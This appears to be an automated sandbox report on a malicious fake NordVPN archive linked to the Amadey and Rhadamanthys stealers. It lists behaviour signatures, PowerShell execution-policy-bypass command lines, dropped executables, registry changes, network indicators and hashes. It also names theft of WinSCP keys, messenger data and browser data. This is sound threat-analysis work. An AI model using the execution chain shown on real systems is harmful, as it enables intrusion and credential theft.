Analysis Overview
SHA256
3f80c20fecafcfa264532eae938edb81dd04c8d0335c366f0b3c4c64ad529967
Threat Level: Known bad
The file NordVPN-10_11.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Rhadamanthys
Amadey
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Stops running service(s)
Reads WinSCP keys stored on the system
Reads local data of messenger clients
UPX packed file
Reads user/profile data of web browsers
Downloads MZ/PE file
Suspicious use of NtSetInformationThreadHideFromDebugger
Checks computer location settings
Loads dropped DLL
Executes dropped EXE
Modifies system executable filetype association
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of SetWindowsHookEx
Modifies system certificate store
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-05-22 00:09
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win11-20240508-en
Max time kernel
86s
Max time network
104s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\HzkTNOg6s1em.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004B8 0x0000000000000490
Network
| Country | Destination | Domain | Proto |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/408-0-0x00007FFB9C413000-0x00007FFB9C415000-memory.dmp
memory/408-1-0x000002897E590000-0x000002897E5B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4esoswws.yht.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/408-10-0x00007FFB9C410000-0x00007FFB9CED2000-memory.dmp
memory/408-11-0x00007FFB9C410000-0x00007FFB9CED2000-memory.dmp
memory/408-12-0x00007FFB9C410000-0x00007FFB9CED2000-memory.dmp
memory/408-15-0x00007FFB9C410000-0x00007FFB9CED2000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:12
Platform
win10v2004-20240426-en
Max time kernel
29s
Max time network
37s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\Launhcer.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:14
Platform
win11-20240508-en
Max time kernel
138s
Max time network
151s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\appInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\appInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\appInfo\\services\\WinRAR.exe,1" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\appInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe
"C:\Users\Admin\AppData\Local\Temp\data\appInfo\services\WinRAR.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2980 -ip 2980
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2980 -s 2944
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| DE | 51.195.68.172:80 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| DE | 51.195.68.172:443 | notifier.rarlab.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:12
Platform
win11-20240508-en
Max time kernel
1s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\appInfo\Zxph8ZShJw5c.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E8 0x00000000000004E0
Network
Files
memory/2584-0-0x00007FFD03473000-0x00007FFD03475000-memory.dmp
memory/2584-1-0x000002A7524B0000-0x000002A7524D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3lbkos0l.ue4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2584-10-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp
memory/2584-11-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp
memory/2584-12-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp
memory/2584-15-0x00007FFD03470000-0x00007FFD03F32000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-22 00:08
Reported
2024-05-22 00:12
Platform
win10v2004-20240426-en
Max time kernel
67s
Max time network
91s
Command Line
Signatures
Amadey
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1236 created 2760 | N/A | C:\Users\Admin\AppData\Roaming\services\plugin4559 | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Stops running service(s)
Reads WinSCP keys stored on the system
Reads local data of messenger clients
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\3plugin14170 | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin29017 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin29017 | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Dctooux.job | C:\Users\Admin\AppData\Roaming\services\3plugin14170 | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\Launhcer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\plugin4559 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\2plugin29017 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\3plugin14170 | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Loads dropped DLL
